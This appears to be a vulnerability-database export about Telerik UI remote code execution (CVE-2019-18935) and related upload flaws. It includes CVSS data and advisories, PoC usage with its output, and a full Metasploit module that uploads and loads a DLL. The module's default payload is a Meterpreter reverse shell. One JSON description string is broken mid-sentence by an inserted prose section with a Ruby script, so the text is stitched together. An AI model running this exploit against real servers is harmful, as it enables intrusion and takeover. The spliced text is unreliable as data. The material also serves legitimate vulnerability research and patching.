"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. 
The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange 
initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-09T19:56:16", "description": "An arbitrary file upload vulnerability exists in Telerik UI. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "checkpoint_advisories", "title": "Telerik UI Arbitrary File Upload (CVE-2017-11317; CVE-2017-11357)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357"], "modified": "2020-07-13T00:00:00", "id": "CPAI-2017-1057", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-12-17T11:19:29", "description": "A security bypass vulnerability exists in Telerik Web UI. Successful exploitation of this vulnerability can lead to cross-site scripting, arbitrary file uploads and downloads, leak of MachineKey and compromise of the ASP.NET ViewState on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-14T00:00:00", "type": "checkpoint_advisories", "title": "Telerik Web UI Information Disclosure (CVE-2017-9248)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2019-10-06T00:00:00", "id": "CPAI-2019-0396", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-22T05:20:05", "description": "This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. 
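The description above says the upload step only works with knowledge of the RadAsyncUpload (RAU) cryptographic keys, and that the CVE-2017-11317 fix randomizes the defaults. As an added example that is not part of this page or of the Metasploit module, the Ruby below re-implements the RAU configuration crypto the module relies on (PBKDF2-SHA1 key/IV derivation with the fixed salt, AES-256-CBC, HMAC-SHA256 over the base64 ciphertext) and turns it around for the defender: take a `rauPostData` value captured from a proxy, WAF or request log and test whether it still decrypts under the default key, and whether the folder fields carry a valid signature. The sample configuration, the `2019.3.1023` type-name string and the "rotated" key names are constructed for the example; the wire format (UTF-16LE JSON, `&`-joined base64 blobs, 44-character base64 HMAC suffix) is taken from the module above.

```ruby
require 'openssl'
require 'base64'
require 'json'

RAU_SALT = "\x3a\x54\x5b\x19\x0a\x22\x1d\x44\x3c\x58\x2c\x33\x01".b
DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'
DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'

# PBKDF2-SHA1 (1000 rounds, fixed salt) yields 48 bytes: AES-256 key + 16-byte IV.
# Because the IV is derived from the key, the same plaintext always encrypts to
# the same ciphertext, so captured blobs can be compared byte for byte.
def rau_cipher(key, mode)
  blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(key, RAU_SALT, 1000, 48)
  cipher = OpenSSL::Cipher.new('AES-256-CBC').public_send(mode)
  cipher.key = blob[0, 32]
  cipher.iv = blob[32, 16]
  cipher
end

def rau_encrypt(bytes, key = DEFAULT_RAU_ENCRYPTION_KEY)
  c = rau_cipher(key, :encrypt)
  body = bytes.empty? ? ''.b : c.update(bytes) # Cipher#update rejects empty input
  Base64.strict_encode64(body + c.final)
end

def rau_decrypt(b64, key = DEFAULT_RAU_ENCRYPTION_KEY)
  c = rau_cipher(key, :decrypt)
  c.update(Base64.strict_decode64(b64)) + c.final
end

# Versions from 2017.1.118 on append base64(HMAC-SHA256(sig_key, base64 ciphertext)).
def rau_sign(b64, key = DEFAULT_RAU_SIGNING_KEY)
  Base64.strict_encode64(OpenSSL::HMAC.digest('SHA256', key, b64))
end

# Constant-time comparison so the signature check does not leak via timing.
def ct_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# rauPostData = enc(UTF-16LE JSON config) + '&' + enc(UTF-16LE .NET type name)
def build_rau_post_data(config, type_name, enc_key: DEFAULT_RAU_ENCRYPTION_KEY)
  "#{rau_encrypt(config.to_json.encode('UTF-16LE'), enc_key)}&" \
    "#{rau_encrypt(type_name.encode('UTF-16LE'), enc_key)}"
end

def decode_rau_post_data(rau_post_data, enc_key: DEFAULT_RAU_ENCRYPTION_KEY)
  enc_cfg, enc_type = rau_post_data.split('&', 2)
  utf8 = ->(bin) { bin.force_encoding('UTF-16LE').encode('UTF-8') }
  [JSON.parse(utf8.call(rau_decrypt(enc_cfg, enc_key))), utf8.call(rau_decrypt(enc_type, enc_key))]
end

# A captured blob that decrypts to a JSON object under the default key means the
# CVE-2017-11317 defaults are still in place, i.e. the upload step of CVE-2019-18935 works.
def default_rau_keys?(rau_post_data)
  cfg, = decode_rau_post_data(rau_post_data)
  cfg.is_a?(Hash)
rescue StandardError # bad padding, invalid UTF-16 or non-JSON output: not the default key
  false
end

# Signature check a >= 2017.1.118 handler applies to TargetFolder / TempTargetFolder.
def valid_signed_folder?(signed, sig_key = DEFAULT_RAU_SIGNING_KEY)
  return false unless signed.length > 44 # 32-byte HMAC -> 44 base64 characters
  ct_equal?(signed[-44, 44], rau_sign(signed[0...-44], sig_key))
end

# Constructed sample: the folder fields a 2019.x client would send for C:\Windows\Temp.
SAMPLE_TYPE = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, ' \
              'Version=2019.3.1023, Culture=neutral, PublicKeyToken=121fae78165ba3d4'
def sample_config
  target = rau_encrypt(''.b)
  temp = rau_encrypt('C:\\Windows\\Temp'.encode('UTF-16LE'))
  { 'TargetFolder' => target + rau_sign(target), 'TempTargetFolder' => temp + rau_sign(temp),
    'MaxFileSize' => 0, 'UseApplicationPoolImpersonation' => false }
end

if __FILE__ == $PROGRAM_NAME
  blob = build_rau_post_data(sample_config, SAMPLE_TYPE)
  puts "default keys in use: #{default_rau_keys?(blob)}"
  rotated = build_rau_post_data(sample_config, SAMPLE_TYPE, enc_key: 'rotated-encryption-key')
  puts "default keys in use (rotated server): #{default_rau_keys?(rotated)}"
end
```

The same decode path is what an incident responder needs to read the `TempTargetFolder` and `AsyncUploadTypeName` out of a captured request: if the type name is anything other than `Telerik.Web.UI.AsyncUploadConfiguration` (the module above swaps in `System.Configuration.Install.AssemblyInstaller`), the request was a deserialization attempt, not an upload. The module's comment that older versions may need PBKDF1 applies here too; this example implements only the PBKDF2 variant.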
It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 2020.3.915).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "zdt", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-11317"], "modified": "2020-10-21T00:00:00", "id": "1337DAY-ID-35085", "href": "https://0day.today/exploit/description/35085", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n 
DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 
'2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 
'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request 
to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded 
#{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = 
get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://0day.today/exploit/35085", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. 
